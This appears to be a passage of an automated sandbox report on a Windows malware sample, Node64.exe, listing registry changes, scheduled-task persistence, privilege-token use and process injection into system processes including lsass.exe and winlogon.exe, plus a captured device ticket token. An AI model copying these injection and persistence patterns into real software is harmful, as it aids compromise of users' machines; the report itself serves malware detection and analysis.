Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2C5C930-ED4B-4A58-B011-C97B23288330}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek C:\Windows\System32\mousocoreworker.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DE3EC6A" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DE3EC6A" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\mousocoreworker.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f568195fd89c2d45ba66f134061263750000000002000000000010660000000100002000000022d465a17fc2e82f2fd8ae421ebad4037396ebdfcfd8dd9acef6db86bffe820c000000000e800000000200002000000058bb1295083f924879b43722f305d729a2db8740fed5f8b82dbc5bd4cbf3f612b0030000436836fc0b8f1fe3a53c9c92287cc8ef0b410e69049375af493efd17a413771f0af75056bf8a33ab32d5809b4cb3005a49ea779f2150bf599d8e745ebf3a2d60bbf1158cd9b6c6982468ce7349d208f73cb60a7d5cdd1520197209aed1bda07963afce3cb43b47fafd50a4076e27886c1e2913067e85ae2514028dec95f0c7e4aa895f0de028a834c4e605f1ecfb73711050ec2ce83fcd0a7715d594ec7970d88a10b147f82648785cec8a1cdb9852bd319d5dbf8504dccd165c1be0a852c38a65fa749695e6f7ee10e534ddf256f6173e4b9cc41f089cbbe9d1496c5f03244938474f635ee13fd9151a6caef0728e6931ef5a9836254c78edf5f54b1c8b9faa5e8a452050437eaa5433ce113de64be95c62d40a983768e3c5fe9e6726f047cffdc15e24afdd632ffe85807f0844cebb6e8a619ef1329d30b7fe3586a2f8b8b3bec2a0057302b49fdb9bea3f5bf9b51da29f1e084a83be85b9fe252b035832884f81d82524b3d3c3834b4a38c4f5b783d589f132bf7f9ab284045275903c97e991950ebf3835478f2cc643255efa6ed5a7f440da1fc6cffb3d2af467f2c6d97a1d847ace77a7bb54b4c062fc99ec113dd84929cd30d33627cd6dd7379cd8834fbfe1c33cc53386278bc48a74aec354fa54f424e680799ff98a031c9bd3bd9149c7c57aa28d9f21e533f7c660f9655d331ea93f345219e098fa01e31202b66b177489baba10d9c08325224842e2785ed09cd787f20be60b6b1e63af405ae8603300ff9039fea02f918d6069476206d810eaf4ff4c34e3c8eaea14f8bdec0aee4f8c1d566dbfee23183084bce8dcc207ed85c4bf1a864de8d1aa2442538098ba0549cbbdc91ac95f7ba1b8ccaf62f73e3c4a6965cd8e747ea1d37578bc45401d10ad0086911ab7436f6f16099f52afb3049cb5494ce4422280cb00084c5b2ed66e6050cdd6825a921f5993345eda6565878525a946da4f2921565f689d3ea1ab9911a686a162b4f953806fa7ee96dd35cc83ce86334110c956c0d4d4d03b1fdc85ffcb82f2504cf3cd7a44e290f7f9544425033f5a368735b08dcea3fd917d7c0ff14c5f5c8de436f0f15582a30e8d768d189d861bd30e18d580b1a7b2563801cc112072264f48ffb2ef03b30388b0cd17abc885e9dad26e29ace8ac379b67c724fab6e664c4097fd8e2c36235ba73ce56d2f23a98eb43deb65b9b30369f4722627a9478b37fe4ce982bae804d17fdd397149368b040195d9463e1e150962ddcc19a23095888a3aaa119c459d73edac9b4a2152317eabf96982d74aef0f601a02a97763e04d8d93364573e24f66a0bc33240000000f80e10c1d8ba925cb1d640d90623e36c858ac8a1eb5a9c14e6e3ccf39f5010b98dca39267b903408ffa164e95645de8fa4f637e8777d1df029f1aa34c1a0bbe6 C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node32.exe
PID 2568 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node32.exe
PID 2568 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node32.exe
PID 2568 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node2Json.exe
PID 2568 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node2Json.exe
PID 2568 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\schtasks.exe
PID 2568 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node3Json.exe
PID 2568 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe C:\Windows\System32\$Node3Json.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1300 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 324 wrote to memory of 628 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 324 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 324 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 408 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 400 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 416 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 764 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1040 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 324 wrote to memory of 1072 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1176 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1248 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1264 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1444 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
